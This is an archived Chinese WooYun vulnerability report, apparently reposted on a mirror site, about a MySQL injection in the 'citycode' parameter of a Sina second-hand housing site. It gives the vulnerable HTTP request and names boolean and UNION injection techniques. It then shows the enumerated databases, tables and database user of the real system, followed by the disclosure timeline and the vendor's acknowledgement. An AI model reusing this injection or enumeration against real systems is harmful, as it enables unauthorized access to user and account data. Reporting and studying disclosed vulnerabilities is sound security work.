乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-24: 细节已通知厂商并且等待厂商处理中 2016-04-27: 厂商已经确认,细节仅向厂商公开 2016-05-07: 细节向核心白帽子及相关领域专家公开 2016-05-17: 细节向普通白帽子公开 2016-05-27: 细节向实习白帽子公开 2016-06-11: 细节向公众公开
新浪某站MySQL注射(支持三种查询)
GET /di/positioncommunity/?citycode=cd&x=104.03249595349092&y=30.607376004698764&callback=jsonp4&_=1461490791828 HTTP/1.1Host: cd.esf.sina.com.cnConnection: closeAccept: */*User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 KoudailejuAppAccept-Language: zh-cnReferer: http://m.leju.com/touch/esf/cd?ln=ljmf_h5&source=ios&s=yd_kdljAccept-Encoding: gzip, deflate
新浪二手房站点
注入参数#citycode
布尔注入
UNION联合查询
全国64个库
[*] information_sch[*] mysql[*] performance_sch[*] shop_admin[*] shop_anshan[*] shop_bt[*] shop_cc[*] shop_cd[*] shop_cq[*] shop_cs[*] shop_cz[*] shop_dg[*] shop_dl[*] shop_fs[*] shop_fushun[*] shop_fz[*] shop_gg[*] shop_gl[*] shop_gy[*] shop_gz[*] shop_haikou[*] shop_heb[*] shop_hf[*] shop_hhht[*] shop_huizhou[*] shop_hz[*] shop_jn[*] shop_km[*] shop_ks[*] shop_lanzhou[*] shop_lw[*] shop_nb[*] shop_nc[*] shop_nj[*] shop_nn[*] shop_nt[*] shop_qd[*] shop_qhd[*] shop_sanya[*] shop_sh[*] shop_sjz[*] shop_suzhou[*] shop_sy[*] shop_sz[*] shop_tangshan[*] shop_ty[*] shop_weifang[*] shop_weihai[*] shop_wh[*] shop_wlmq[*] shop_wuhu[*] shop_wx[*] shop_xian[*] shop_xm[*] shop_xz[*] shop_yangzhou[*] shop_yinchuan[*] shop_yt[*] shop_zb[*] shop_zhengzhou[*] shop_zhongshan[*] shop_zhuhai[*] shop_zz[*] test
ad_listad_namead_timecommunity_distancesetcommunity_distancesetcommunity_stypecommunity_stype_setcommunity_stype_set_lcount_house_avgpricedict_districtblockdict_districtblock_mees_home_comparees_home_spideres_pinzhuan_keywordes_pinzhuan_keyword_wes_pinzhuan_statusesf_acl_accessesf_acl_roleesf_acl_role_accessesf_acl_useresf_acl_user_roleesf_city_priceesf_delegate_agentesf_delegate_houseesf_delegate_picesf_home_applyesf_home_fangjiaesf_home_infoesf_home_info_extesf_home_info_tmp_jiaesf_home_jiajuesf_home_othernameesf_home_pic_fxesf_home_pic_xqesf_home_pinzhuanesf_home_priceesf_home_relationesf_home_scoreesf_home_settingesf_home_subwayesf_home_transferesf_home_useresf_home_usertopesf_home_weixinesf_home_zhidaesf_house_chuchuangesf_house_rzassignesf_house_rzassign_loesf_house_rzassign_usesf_house_tagesf_house_urlwhiteesf_shop_houseesf_shop_house_assignesf_shop_house_picesf_sitemapesf_smsoutesf_user_helperpicesf_user_mainhomeesf_user_shopesf_weixin_logesf_weixin_menuesf_weixin_passportesf_weixin_passport2esf_weixin_subscribeesf_weixin_subscribe_esf_weixin_ticketesf_weixin_ticket_useesf_weixin_userfnj_agentjob_distributejob_logmobile_pocketagent_bomobile_sendmessage_lopush_data_logsp_agentphonesp_limesp_logsp_membersp_noticesp_pay_logsp_permissionsp_pwd_logsp_rolesp_role_permissionsp_sys_usersp_sys_userpermissionsp_usersp_user_bjsp_user_del_logsp_user_extsp_user_ext_shsp_user_loginlogsp_user_picsp_user_shsp_weixin_logsp_weixin_usertest
当前数据库:'shop_admin'当前数据库用户:'[email protected].%'
过滤
危害等级:中
漏洞Rank:6
确认时间:2016-04-27 15:49
感谢关注新浪安全,问题修复中。
暂无